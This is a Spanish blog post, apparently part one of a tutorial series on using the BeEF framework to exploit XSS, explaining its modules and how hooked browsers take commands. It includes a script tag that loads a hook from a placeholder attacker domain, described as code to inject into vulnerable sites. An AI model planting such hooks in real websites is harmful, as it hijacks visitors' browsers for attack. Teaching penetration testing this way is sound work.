Pentest con BeEF: explotando XSS (I de V)

Buenas a todos, hoy comenzaremos una nueva cadena de artículos en la que hablaremos sobre la explotación de vulnerabilidades de tipo XSS a través de la herramienta BeEF.

BeEF es una aplicación orientada a los Test de Penetración desarrollada por el equipo de Bindshell. Su funcionalidad principal es la de recolectar zombies, para después poder lanzarles distintos ataques a través de scripts.

En BeEF los ataques se encuentran separados por módulos. Distinguimos en la herramienta tres grupos de módulos, que coinciden con los menús desplegables con los que cuenta la herramienta

  • Módulos estándar: Incluyen diferentes ataques con los que podremos averiguar distintos datos de la víctima infectada, como por ejemplo si su navegador soporta Flash.
  • Módulos de exploits: Incluyen diferentes exploits a distintos navegadores
  • Módulos de red: Incluyen módulos para investigar sobre la red interna en la que se encuentra la víctima.
 

 

A continuación podéis ver los distintos módulos:

 

 La "infección" de la víctima se realiza a través de un código javascript malicioso:
<script src="http://www.webDelHackerMalicioso.com/beef /hook/beefmagic.js.php></script>

Este código malicioso debe ser introducido en algún sitio web vulnerable a XSS o en un sitio web en el que nosotros podamos modificar el código fuente.

A continuación enumeraremos los pasos principales del proceso, que es muy semejante al que se produce entre el cliente y el servidor de FLU:

  1. Un usuario visita el sitio Web que contiene el script malicioso, que previamente habremos introducido explotando una vulnerabilidad de XSS.
  2. El usuario, ahora victima, visitará sin querer www.webDelHackerMalicioso.com.
  3. Al igual que ocurre con una máquina infectada con Flu, la víctima solicitará operaciones para realizar a BeEF (mediante peticiones GET).
  4. La victima ejecuta las operaciones y devuelve los resultados a BeEF.

Eso es todo por hoy, el próximo día veremos como arrancar el servidor de BeEF en una distribución Blackbuntu, y comenzaremos a realizar las primeras pruebas con la herramienta.

Saludos!

 


 

Pentest con BeEF: explotando XSS (I de V)

Pentest con BeEF: explotando XSS (II de V)

Pentest con BeEF: explotando XSS (III de V)

Pentest con BeEF: explotando XSS (IV de V)

Pentest con BeEF: explotando XSS (V de V)